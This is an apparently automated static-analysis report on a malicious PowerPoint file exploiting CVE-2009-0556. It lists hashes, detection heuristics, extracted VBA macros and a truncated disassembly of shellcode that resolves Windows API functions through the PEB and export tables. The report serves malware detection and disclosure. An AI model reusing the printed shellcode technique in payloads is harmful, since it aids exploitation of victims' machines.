Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31850d59d19309e4…

MALICIOUS

Office (OLE)

Size: 818.5 KB
Created: 2008-01-27 01:25:33
Authoring application: Microsoft PowerPoint
First seen: 2012-06-30
MD5: 5de89ec7545b90d42c417501a810e948
SHA-1: f9b5b020d96540695d76c9a43ca9daa35b54cb28
SHA-256: 31850d59d19309e48986473b0a57039d893f2643a947f9e6b67b4cadb2ed0bbe
Risk score: 228

Heuristics 6

  • CVE-2009-0556 — PowerPoint malformed ClientTextbox critical CVE exact CVE_2009_0556
    The PowerPoint record graph contains an Escher ClientTextbox with both OutlineTextRefAtom and TextHeaderAtom children. This is the OffVis-compatible structural condition for the PowerPoint memory corruption vulnerability fixed in MS09-017.
  • ClamAV: Ppt.Exploit.Apptom-10029459-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ppt.Exploit.Apptom-10029459-0
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.83) — 5/6 branch targets land on an instruction boundary (83% coherence)
    00000A05  64a130000000      mov eax, dword ptr fs:[0x30]
    00000A0B  8b400c            mov eax, dword ptr [eax + 0xc]
    00000A0E  8b701c            mov esi, dword ptr [eax + 0x1c]
    00000A11  ad                lodsd eax, dword ptr [esi]
    00000A12  8b7808            mov edi, dword ptr [eax + 8]
    00000A15  8b473c            mov eax, dword ptr [edi + 0x3c]
    00000A18  8b543878          mov edx, dword ptr [eax + edi + 0x78]
    00000A1C  03d7              add edx, edi
    00000A1E  8b5a20            mov ebx, dword ptr [edx + 0x20]
    00000A21  03df              add ebx, edi
    00000A23  33c9              xor ecx, ecx
    00000A25  41                inc ecx
    00000A26  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000A29  03f7              add esi, edi
    00000A2B  b849734261        mov eax, 0x61427349
    00000A30  3b06              cmp eax, dword ptr [esi]
    00000A32  75f1              jne 0xa25
    00000A34  b864577269        mov eax, 0x69725764
    00000A39  3b4604            cmp eax, dword ptr [esi + 4]
    00000A3C  75e7              jne 0xa25
    00000A3E  8b5a24            mov ebx, dword ptr [edx + 0x24]
    00000A41  03df              add ebx, edi
    00000A43  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    00000A47  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    00000A4A  03df              add ebx, edi
    00000A4C  8b048b            mov eax, dword ptr [ebx + ecx*4]
    00000A4F  03c7              add eax, edi
    00000A51  bf00000030        mov edi, 0x30000000
    00000A56  8bd8              mov ebx, eax
    00000A58  81c700100000      add edi, 0x1000
    00000A5E  6800040000        push 0x400
    00000A63  57                push edi
    00000A64  ff                .byte 0xff
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xlApp = CreateObject("Excel.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1005 bytes
SHA-256: 7403e4728955600b20e1b11715dae9328df16f95bc7db40bf64d8dfe55835d1d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub AutoOpen()
'Parameters: [PPT file] [macro name]
c = Command()
cl = InStr(c, " ")
c1 = Left(c, cl - 1)
c2 = Right(c, Len(c) - cl)
Dim a As New PowerPoint.Application
a.WindowState = ppWindowMaximized
a.Visible = True
a.Presentations.Open c1
a.Run (c1 & "!" & c2)
Set a = Nothing


End Sub

Dim xlApp As excel.Application
Dim xlBook As excel.workbook

Sub test()

    'launch the Excel file
    Set xlApp = CreateObject("Excel.Application")
    Set xlBook = xlApp.workbooks.Open("chemin_du_fichier.xls")
    xlApp.Visible = True
    
End Sub

Sub valid()

    'run the Excel valider macro
    xlApp.Run "feuil2.valider"

End Sub

Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False